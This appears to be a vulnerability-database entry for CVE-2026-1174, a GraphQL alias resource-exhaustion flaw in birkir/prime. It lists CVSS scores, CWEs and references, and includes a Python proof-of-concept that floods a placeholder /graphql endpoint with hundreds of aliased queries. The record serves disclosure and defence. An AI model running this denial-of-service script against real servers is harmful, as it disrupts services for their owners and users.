Security Vulnerability Report
CVE-2026-1174 CVSS 5.3 MEDIUM

CVE-2026-1174

Published: 2026-01-19 20:15:49
Last Modified: 2026-02-23 09:16:50

Description

A vulnerability was determined in birkir prime up to 0.4.0.beta.0. It affects an unknown function in the file /graphql of the GraphQL Alias Handler component. The manipulation leads to resource consumption. The attack can be carried out remotely. The exploit has been publicly disclosed and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Note: the score above is the secondary (CNA) assessment. NVD's primary CVSS 3.1 assessment rates the availability impact as High: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, base score 7.5 (HIGH). The CNA additionally assigns a CVSS 4.0 base score of 5.5 (MEDIUM) with exploit maturity Proof-of-Concept.

Weaknesses
CWE-400 (Uncontrolled Resource Consumption), CWE-404 (Improper Resource Shutdown or Release)

Configurations (Affected Products)

cpe:2.3:a:birkir:prime:*:*:*:*:*:*:*:* - VULNERABLE
birkir/prime <= 0.4.0.beta.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-1174 PoC - GraphQL Resource Consumption
# Target: birkir/prime <= 0.4.0.beta.0
# Attack Vector: GraphQL Alias Handler
import requests
import json

TARGET_URL = "http://target.com/graphql"

# PoC: Send a GraphQL query with excessive aliases to consume resources
poc_query = """
query {
"""
# Generate 1000 aliases to trigger resource consumption
for i in range(1000):
    poc_query += f"  alias{i}: someComplexField(id: {i}) {{\n    id\n    name\n    computedValue\n  }}\n"
poc_query += """
}
"""

payload = {"query": poc_query}

print("Sending malicious GraphQL query...")
response = requests.post(TARGET_URL, json=payload, timeout=30)
print(f"Response status: {response.status_code}")
print(f"Response: {response.text[:500]}")

# Alternative PoC with nested aliases
poc_query_2 = """
query {
"""
for i in range(500):
    poc_query_2 += f"  field{i}: nestedObject {{ child {{ subChild {{ value }} }} }}\n"
poc_query_2 += """
}
"""

print("\nSending nested alias query...")
response2 = requests.post(TARGET_URL, json={"query": poc_query_2}, timeout=30)
print(f"Response status: {response2.status_code}")

References

https://github.com/birkir/prime/
https://github.com/birkir/prime/issues/545 (Exploit, Issue Tracking, Vendor Advisory)
https://vuldb.com/?ctiid.341768 (Permissions Required, VDB Entry)
https://vuldb.com/?id.341768
Raw JSON Data
